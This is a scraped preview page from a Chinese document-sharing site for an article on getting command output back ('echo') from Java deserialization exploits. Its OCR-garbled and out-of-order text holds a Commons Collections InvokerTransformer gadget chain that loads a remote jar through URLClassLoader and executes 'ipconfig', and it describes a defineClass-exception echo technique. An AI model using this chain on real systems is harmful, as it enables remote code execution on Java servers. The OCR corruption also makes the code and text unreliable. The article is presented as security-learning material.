没有合适的资源?快使用搜索试试~ 我知道了~
Java反序列化回显解决方案.docx
0 下载量 6 浏览量
2022-12-19
10:48:45
上传
评论
收藏 127KB DOCX 举报
温馨提示
试读
11页
Java反序列化回显解决方案.docx
资源推荐
资源详情
资源评论
Java反序列化回显解决方案
new InvokerTransformer(*getConstructor*»new Class[]{Class[J.class}.
new Object[](new Class[](URL[J.class))),new InvokerTransformer(*newInstance*.
new Class[]{Object[].class),new Object [] (now Object[] (nw CRLU {new l'RL("hltp:〃127.0.0. 1:8090/sunner. jar*)}))),
new InvokerTvansformer(*loadClass\new Class[]{String.class},
new Object!] {^suniier*}),new InvokerTransformer ("gzConmucik,
nw Classi] {Class[],class},new Object[](nev Class[](Siring.class)}).
new InvokerTransformer(*newlnstance*.
ne*
1
Class[] {Object[].class).
new Object[](nev String[]{^ipconfig*}))总结
笔者这里总结都是以cc链为改造基础,其实CC还有很多玩法,大家可以脑洞一下,Java反
序列化回显也不止本文中两种,比例说RMI、weblogic的T3协议。学习无止境,努
力就完事。
于无常处知有情,于有情处知众生
参考https://javasec.
org/javase/ClassLoader/
. aliyun. com/1/7740
Java小白修炼手册
-全文完-
题外话
这是一篇本应该早就完成的文章,但是由于各种原因拖延至此。之前有读者就催我, 但是
实在是各种事情缠身,加上自己颓废了一段时间导致现在才公布。之后可能会断更一段 时间关于
代码审计方面文章,时间暂不确定。其实有几个题材早也确定,但是实在是没时间 去整理素材,
加上项目的更新,让我变得更加繁忙,在此给位先说一声对不起。
前百
大多数Java反序列化漏洞都能执行命令,导致RCE。小伙伴们有没有想过网络上大多 数
payload都是以弹计算机为止,但目标主机有没有弹计算机,或者执行其他的命令的时候 我们是并
不知道的,因为没有回显任何的结果。这篇文章以反序列化漏洞的回显为题,教你 解决如何解决
反序列化漏洞回显。
PS:为避免代码太长而导致的阅读效果,故将完整的实验代码全部己经上传至https://github.
com/SummerSec/JavaLearnVulnerabi1ity
defineclass异常回显
def ineclass是java. lang. ClassLoader类下的一个类方法,将字节码转化为Cl ass类。
protected final Class<?> defineClass(String name, byte[] b, int off, int ten)throws ClassFormatError return
defineClass(name
z
b, off
z
len, protectionDomain: null);
剩余10页未读,继续阅读
资源评论
matlab大师
- 粉丝: 2367
- 资源: 9万+
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功